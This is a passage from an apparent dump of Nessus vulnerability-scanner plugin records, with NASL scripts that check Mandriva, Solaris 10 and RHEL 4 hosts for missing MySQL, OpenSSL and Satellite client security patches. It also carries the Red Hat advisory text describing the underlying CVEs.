(rpm_check(release:\"MDK2006.0\", reference:\"MySQL-common-4.1.12-4.10.20060mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK2006.0\", cpu:\"x86_64\", reference:\"lib64mysql14-4.1.12-4.10.20060mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK2006.0\", cpu:\"x86_64\", reference:\"lib64mysql14-devel-4.1.12-4.10.20060mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK2006.0\", cpu:\"i386\", reference:\"libmysql14-4.1.12-4.10.20060mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK2006.0\", cpu:\"i386\", reference:\"libmysql14-devel-4.1.12-4.10.20060mdk\", yank:\"mdk\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:33:29", "description": "SunOS 5.10_x86: libssl patch.\nDate this patch was last updated by Sun : Apr/23/07", "cvss3": {"score": null, "vector": null}, "published": "2018-03-12T00:00:00", "type": "nessus", "title": "Solaris 10 (x86) : 121230-02", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2006-2937", "CVE-2006-2940", "CVE-2006-3738", "CVE-2006-4339", "CVE-2006-4343", "CVE-2006-5201", "CVE-2006-7140", "CVE-2007-5135"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:oracle:solaris:10:121230", "cpe:/o:oracle:solaris:10"], "id": "SOLARIS10_X86_121230-02.NASL", "href": "https://www.tenable.com/plugins/nessus/107877", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text in this plugin was\n# extracted from the Oracle SunOS Patch Updates.\n#\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(107877);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2006-2937\", \"CVE-2006-2940\", \"CVE-2006-3738\", \"CVE-2006-4339\", \"CVE-2006-4343\", \"CVE-2006-5201\", \"CVE-2006-7140\", \"CVE-2007-5135\");\n\n script_name(english:\"Solaris 10 (x86) : 121230-02\");\n script_summary(english:\"Check for patch 121230-02\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote host is missing Sun Security Patch number 121230-02\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"SunOS 5.10_x86: libssl patch.\nDate this patch was last updated by Sun : Apr/23/07\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://download.oracle.com/sunalerts/1001144.1.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Install patch 121230-02\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(119, 189, 310, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:121230\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:solaris:10\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2007/04/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/03/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Solaris Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Solaris/showrev\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"solaris.inc\");\n\nshowrev = get_kb_item(\"Host/Solaris/showrev\");\nif (empty_or_null(showrev)) audit(AUDIT_OS_NOT, \"Solaris\");\nos_ver = pregmatch(pattern:\"Release: (\\d+.(\\d+))\", string:showrev);\nif (empty_or_null(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Solaris\");\nfull_ver = os_ver[1];\nos_level = os_ver[2];\nif (full_ver != \"5.10\") audit(AUDIT_OS_NOT, \"Solaris 10\", \"Solaris \" + os_level);\npackage_arch = pregmatch(pattern:\"Application architecture: (\\w+)\", string:showrev);\nif (empty_or_null(package_arch)) audit(AUDIT_UNKNOWN_ARCH);\npackage_arch = package_arch[1];\nif (package_arch != \"i386\") audit(AUDIT_ARCH_NOT, \"i386\", package_arch);\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"121230-02\", obsoleted_by:\"127112-08 127128-11 126254-01 \", package:\"SUNWopenssl-include\", version:\"11.10.0,REV=2005.01.21.16.34\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"121230-02\", obsoleted_by:\"127112-08 127128-11 126254-01 \", package:\"SUNWopenssl-libraries\", version:\"11.10.0,REV=2005.01.21.16.34\") < 0) flag++;\n\nif (flag) {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : solaris_get_report()\n );\n} else {\n patch_fix = solaris_patch_fix_get();\n if (!empty_or_null(patch_fix)) audit(AUDIT_PATCH_INSTALLED, patch_fix, \"Solaris 10\");\n tested = solaris_pkg_tests_get();\n if (!empty_or_null(tested)) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n audit(AUDIT_PACKAGE_NOT_INSTALLED, \"SUNWopenssl-include / SUNWopenssl-libraries\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T13:16:24", "description": "SunOS 5.10_x86: libssl patch.\nDate this patch was last updated by Sun : Apr/23/07", "cvss3": {"score": null, "vector": null}, "published": "2005-12-07T00:00:00", "type": "nessus", "title": "Solaris 10 (x86) : 121230-02", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2006-2937", "CVE-2006-2940", "CVE-2006-3738", "CVE-2006-4339", "CVE-2006-4343", "CVE-2006-5201", "CVE-2006-7140", "CVE-2007-5135"], "modified": "2021-01-14T00:00:00", "cpe": [], "id": "SOLARIS10_X86_121230.NASL", "href": "https://www.tenable.com/plugins/nessus/20275", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n# @DEPRECATED@\n#\n# This script has been deprecated as the associated patch is not\n# currently a recommended security fix.\n#\n# Disabled on 2011/10/24.\n#\n\n#\n# (C) Tenable Network Security, Inc.\n#\n#\n\nif ( ! defined_func(\"bn_random\") ) exit(0);\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif(description)\n{\n script_id(20275);\n script_version(\"1.36\");\n\n script_name(english: \"Solaris 10 (x86) : 121230-02\");\n script_cve_id(\"CVE-2006-2937\", \"CVE-2006-2940\", \"CVE-2006-3738\", \"CVE-2006-4339\", \"CVE-2006-4343\", \"CVE-2006-5201\", \"CVE-2006-7140\", \"CVE-2007-5135\");\n script_set_attribute(attribute: \"synopsis\", value:\n\"The remote host is missing Sun Security Patch number 121230-02\");\n script_set_attribute(attribute: \"description\", value:\n'SunOS 5.10_x86: libssl patch.\nDate this patch was last updated by Sun : Apr/23/07');\n script_set_attribute(attribute: \"solution\", value:\n\"You should install this patch for your system to be up-to-date.\");\n script_set_attribute(attribute: \"see_also\", value:\n\"http://download.oracle.com/sunalerts/1001144.1.html\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cwe_id(189);\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2005/12/07\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2006/09/05\");\n script_end_attributes();\n\n script_summary(english: \"Check for patch 121230-02\");\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2021 Tenable Network Security, Inc.\");\n family[\"english\"] = \"Solaris Local Security Checks\";\n script_family(english:family[\"english\"]);\n \n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/Solaris/showrev\");\n exit(0);\n}\n\n# Deprecated.\nexit(0, \"The associated patch is not currently a recommended security fix.\");\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:33:36", "description": "SunOS 5.10: libssl patch.\nDate this patch was last updated by Sun : Apr/23/07", "cvss3": {"score": null, "vector": null}, "published": "2018-03-12T00:00:00", "type": "nessus", "title": "Solaris 10 (sparc) : 121229-02", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2005-2969", "CVE-2006-2937", "CVE-2006-2940", "CVE-2006-3738", "CVE-2006-4339", "CVE-2006-4343", "CVE-2006-5201", "CVE-2006-7140", "CVE-2007-5135"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:oracle:solaris:10:121229", "cpe:/o:oracle:solaris:10"], "id": "SOLARIS10_121229-02.NASL", "href": "https://www.tenable.com/plugins/nessus/107376", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text in this plugin was\n# extracted from the Oracle SunOS Patch Updates.\n#\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(107376);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2005-2969\", \"CVE-2006-2937\", \"CVE-2006-2940\", \"CVE-2006-3738\", \"CVE-2006-4339\", \"CVE-2006-4343\", \"CVE-2006-5201\", \"CVE-2006-7140\", \"CVE-2007-5135\");\n\n script_name(english:\"Solaris 10 (sparc) : 121229-02\");\n script_summary(english:\"Check for patch 121229-02\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote host is missing Sun Security Patch number 121229-02\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"SunOS 5.10: libssl patch.\nDate this patch was last updated by Sun : Apr/23/07\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://download.oracle.com/sunalerts/1001144.1.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Install patch 121229-02\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(119, 189, 310, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:121229\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:solaris:10\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2007/04/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/03/12\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Solaris Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Solaris/showrev\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"solaris.inc\");\n\nshowrev = get_kb_item(\"Host/Solaris/showrev\");\nif (empty_or_null(showrev)) audit(AUDIT_OS_NOT, \"Solaris\");\nos_ver = pregmatch(pattern:\"Release: (\\d+.(\\d+))\", string:showrev);\nif (empty_or_null(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Solaris\");\nfull_ver = os_ver[1];\nos_level = os_ver[2];\nif (full_ver != \"5.10\") audit(AUDIT_OS_NOT, \"Solaris 10\", \"Solaris \" + os_level);\npackage_arch = pregmatch(pattern:\"Application architecture: (\\w+)\", string:showrev);\nif (empty_or_null(package_arch)) audit(AUDIT_UNKNOWN_ARCH);\npackage_arch = package_arch[1];\nif (package_arch != \"sparc\") audit(AUDIT_ARCH_NOT, \"sparc\", package_arch);\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"121229-02\", obsoleted_by:\"120011-14 \", package:\"SUNWcakr\", version:\"11.10.0,REV=2005.08.25.02.12\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"121229-02\", obsoleted_by:\"120011-14 \", package:\"SUNWopenssl-include\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"121229-02\", obsoleted_by:\"120011-14 \", package:\"SUNWopenssl-libraries\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\n\nif (flag) {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : solaris_get_report()\n );\n} else {\n patch_fix = solaris_patch_fix_get();\n if (!empty_or_null(patch_fix)) audit(AUDIT_PATCH_INSTALLED, patch_fix, \"Solaris 10\");\n tested = solaris_pkg_tests_get();\n if (!empty_or_null(tested)) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n audit(AUDIT_PACKAGE_NOT_INSTALLED, \"SUNWcakr / SUNWopenssl-include / SUNWopenssl-libraries\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T13:16:23", "description": "SunOS 5.10: libssl patch.\nDate this patch was last updated by Sun : Apr/23/07", "cvss3": {"score": null, "vector": null}, "published": "2005-12-07T00:00:00", "type": "nessus", "title": "Solaris 10 (sparc) : 121229-02", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2005-2969", "CVE-2006-2937", "CVE-2006-2940", "CVE-2006-3738", "CVE-2006-4339", "CVE-2006-4343", "CVE-2006-5201", "CVE-2006-7140", "CVE-2007-5135"], "modified": "2021-01-14T00:00:00", "cpe": [], "id": "SOLARIS10_121229.NASL", "href": "https://www.tenable.com/plugins/nessus/20272", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n# @DEPRECATED@\n#\n# This script has been deprecated as the associated patch is not\n# currently a recommended security fix.\n#\n# Disabled on 2011/10/24.\n#\n\n#\n# (C) Tenable Network Security, Inc.\n#\n#\n\nif ( ! defined_func(\"bn_random\") ) exit(0);\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif(description)\n{\n script_id(20272);\n script_version(\"1.33\");\n\n script_name(english: \"Solaris 10 (sparc) : 121229-02\");\n script_cve_id(\"CVE-2005-2969\", \"CVE-2006-2937\", \"CVE-2006-2940\", \"CVE-2006-3738\", \"CVE-2006-4339\", \"CVE-2006-4343\", \"CVE-2006-5201\", \"CVE-2006-7140\", \"CVE-2007-5135\");\n script_set_attribute(attribute: \"synopsis\", value:\n\"The remote host is missing Sun Security Patch number 121229-02\");\n script_set_attribute(attribute: \"description\", value:\n'SunOS 5.10: libssl patch.\nDate this patch was last updated by Sun : Apr/23/07');\n script_set_attribute(attribute: \"solution\", value:\n\"You should install this patch for your system to be up-to-date.\");\n script_set_attribute(attribute: \"see_also\", value:\n\"http://download.oracle.com/sunalerts/1001144.1.html\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cwe_id(189);\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2005/12/07\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2005/10/11\");\n script_end_attributes();\n\n script_summary(english: \"Check for patch 121229-02\");\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2021 Tenable Network Security, Inc.\");\n family[\"english\"] = \"Solaris Local Security Checks\";\n script_family(english:family[\"english\"]);\n \n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/Solaris/showrev\");\n exit(0);\n}\n\n# Deprecated.\nexit(0, \"The associated patch is not currently a recommended security fix.\");\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T13:05:30", "description": "Red Hat Network Satellite Server version 5.1.1 is now available. This update includes fixes for a number of security issues in Red Hat Network Satellite Server Solaris client components.\n\nThis update has been rated as having moderate security impact by the Red Hat Security Response Team.\n\nThis release corrects several security vulnerabilities in components shipped as part of the Red Hat Network Satellite Server Solaris client. In a typical operating environment, these components are not used by the Satellite Server in a vulnerable manner. These security updates will reduce risk should these components be used by other applications.\n\nSeveral flaws in Zlib were discovered. An attacker could create a carefully-crafted compressed stream that would cause an application to crash if the stream was opened by a user. (CVE-2005-2096, CVE-2005-1849)\n\nA buffer overflow was discovered in the OpenSSL SSL_get_shared_ciphers() utility function. An attacker could send a list of ciphers to an application that used this function and overrun a buffer (CVE-2006-3738).\n\nA flaw in the SSLv2 client code was discovered. If a client application used OpenSSL to create an SSLv2 connection to a malicious server, that server could cause the client to crash. (CVE-2006-4343)\n\nAn attack on OpenSSL PKCS #1 v1.5 signatures was discovered. Where an RSA key with exponent 3 was used an attacker could, potentially, forge a PKCS #1 v1.5 signature that would be incorrectly verified by implementations that do not check for excess data in the RSA exponentiation result of the signature. This issue affected applications that use OpenSSL to verify X.509 certificates as well as other uses of PKCS #1 v1.5. (CVE-2006-4339)\n\nOpenSSL contained a software work-around for a bug in SSL handling in Microsoft Internet Explorer version 3.0.2. It is enabled in most servers that use OpenSSL to provide support for SSL and TLS. This work-around was vulnerable to a man-in-the-middle attack which allowed a remote user to force an SSL connection to use SSL 2.0, rather than a stronger protocol, such as SSL 3.0 or TLS 1.0. (CVE-2005-2969)\n\nDuring OpenSSL parsing of certain invalid ASN.1 structures, an error condition was mishandled. This could result in an infinite loop which consumed system memory (CVE-2006-2937).\n\nCertain public key types could take disproportionate amounts of time to process in OpenSSL, leading to a denial of service. (CVE-2006-2940)\n\nA flaw was discovered in the Python repr() function's handling of UTF-32/UCS-4 strings. If an application used the repr() function on untrusted data, this could lead to a denial of service or, possibly, allow the execution of arbitrary code with the privileges of the application using the flawed function. (CVE-2006-4980)\n\nA flaw was discovered in the strxfrm() function of Python's locale module. Strings generated by this function were not properly NULL-terminated. This could, potentially, cause disclosure of data stored in the memory of an application using this function.\n(CVE-2007-2052)\n\nMultiple integer overflow flaws were discovered in Python's imageop module. If an application used the imageop module to process untrusted images, it could cause the application to crash, enter an infinite loop, or, possibly, execute arbitrary code with the privileges of the Python interpreter. (CVE-2007-4965)\n\nA stack-based buffer overflow was discovered in the Python interpreter, which could allow a local user to gain privileges by running a script with a long name from the current working directory.\n(CVE-2006-1542)\n\nUsers of Red Hat Network Satellite Server should upgrade to these updated packages, which contain backported patches to correct these issues.", "cvss3": {"score": null, "vector": null}, "published": "2010-01-10T00:00:00", "type": "nessus", "title": "RHEL 4 : Solaris client in Satellite Server (RHSA-2008:0629)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2005-1849", "CVE-2005-2096", "CVE-2005-2969", "CVE-2006-1542", "CVE-2006-2937", "CVE-2006-2940", "CVE-2006-3738", "CVE-2006-4339", "CVE-2006-4343", "CVE-2006-4980", "CVE-2007-2052", "CVE-2007-4965"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:rhn-solaris-bootstrap", "p-cpe:/a:redhat:enterprise_linux:rhn_solaris_bootstrap_5_1_1_3", "cpe:/o:redhat:enterprise_linux:4"], "id": "REDHAT-RHSA-2008-0629.NASL", "href": "https://www.tenable.com/plugins/nessus/43839", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2008:0629. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(43839);\n script_version(\"1.25\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2005-1849\", \"CVE-2005-2096\", \"CVE-2005-2969\", \"CVE-2006-1542\", \"CVE-2006-2937\", \"CVE-2006-2940\", \"CVE-2006-3738\", \"CVE-2006-4339\", \"CVE-2006-4343\", \"CVE-2006-4980\", \"CVE-2007-2052\", \"CVE-2007-4965\");\n script_bugtraq_id(19849, 20246, 20247, 20248, 20249, 25696);\n script_xref(name:\"RHSA\", value:\"2008:0629\");\n\n script_name(english:\"RHEL 4 : Solaris client in Satellite Server (RHSA-2008:0629)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Red Hat Network Satellite Server version 5.1.1 is now available. This\nupdate includes fixes for a number of security issues in Red Hat\nNetwork Satellite Server Solaris client components.\n\nThis update has been rated as having moderate security impact by the\nRed Hat Security Response Team.\n\nThis release corrects several security vulnerabilities in components\nshipped as part of the Red Hat Network Satellite Server Solaris\nclient. In a typical operating environment, these components are not\nused by the Satellite Server in a vulnerable manner. These security\nupdates will reduce risk should these components be used by other\napplications.\n\nSeveral flaws in Zlib were discovered. An attacker could create a\ncarefully-crafted compressed stream that would cause an application to\ncrash if the stream was opened by a user. (CVE-2005-2096,\nCVE-2005-1849)\n\nA buffer overflow was discovered in the OpenSSL\nSSL_get_shared_ciphers() utility function. An attacker could send a\nlist of ciphers to an application that used this function and overrun\na buffer (CVE-2006-3738).\n\nA flaw in the SSLv2 client code was discovered. If a client\napplication used OpenSSL to create an SSLv2 connection to a malicious\nserver, that server could cause the client to crash. (CVE-2006-4343)\n\nAn attack on OpenSSL PKCS #1 v1.5 signatures was discovered. Where an\nRSA key with exponent 3 was used an attacker could, potentially, forge\na PKCS #1 v1.5 signature that would be incorrectly verified by\nimplementations that do not check for excess data in the RSA\nexponentiation result of the signature. This issue affected\napplications that use OpenSSL to verify X.509 certificates as well as\nother uses of PKCS #1 v1.5. (CVE-2006-4339)\n\nOpenSSL contained a software work-around for a bug in SSL handling in\nMicrosoft Internet Explorer version 3.0.2. It is enabled in most\nservers that use OpenSSL to provide support for SSL and TLS. This\nwork-around was vulnerable to a man-in-the-middle attack which allowed\na remote user to force an SSL connection to use SSL 2.0, rather than a\nstronger protocol, such as SSL 3.0 or TLS 1.0. (CVE-2005-2969)\n\nDuring OpenSSL parsing of certain invalid ASN.1 structures, an error\ncondition was mishandled. This could result in an infinite loop which\nconsumed system memory (CVE-2006-2937).\n\nCertain public key types could take disproportionate amounts of time\nto process in OpenSSL, leading to a denial of service. (CVE-2006-2940)\n\nA flaw was discovered in the Python repr() function's handling of\nUTF-32/UCS-4 strings. If an application used the repr() function on\nuntrusted data, this could lead to a denial of service or, possibly,\nallow the execution of arbitrary code with the privileges of the\napplication using the flawed function. (CVE-2006-4980)\n\nA flaw was discovered in the strxfrm() function of Python's locale\nmodule. Strings generated by this function were not properly\nNULL-terminated. This could, potentially, cause disclosure of data\nstored in the memory of an application using this function.\n(CVE-2007-2052)\n\nMultiple integer overflow flaws were discovered in Python's imageop\nmodule. If an application used the imageop module to process untrusted\nimages, it could cause the application to crash, enter an infinite\nloop, or, possibly, execute arbitrary code with the privileges of the\nPython interpreter. (CVE-2007-4965)\n\nA stack-based buffer overflow was discovered in the Python\ninterpreter, which could allow a local user to gain privileges by\nrunning a script with a long name from the current working directory.\n(CVE-2006-1542)\n\nUsers of Red Hat Network Satellite Server should upgrade to these\nupdated packages, which contain backported patches to correct these\nissues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2005-1849\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2005-2096\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2005-2969\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2006-1542\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2006-2937\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2006-2940\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2006-3738\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2006-4339\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2006-4343\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2006-4980\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2007-2052\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2007-4965\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2008:0629\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Update the affected rhn-solaris-bootstrap and / or\nrhn_solaris_bootstrap_5_1_1_3 packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(119, 189, 310, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhn-solaris-bootstrap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhn_solaris_bootstrap_5_1_1_3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:4\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2005/07/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/08/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/01/10\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^4([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 4.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2008:0629\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n\n if (! (rpm_exists(release:\"RHEL4\", rpm:\"rhns-solaris-\"))) audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Satellite Server\");\n\n if (rpm_check(release:\"RHEL4\", 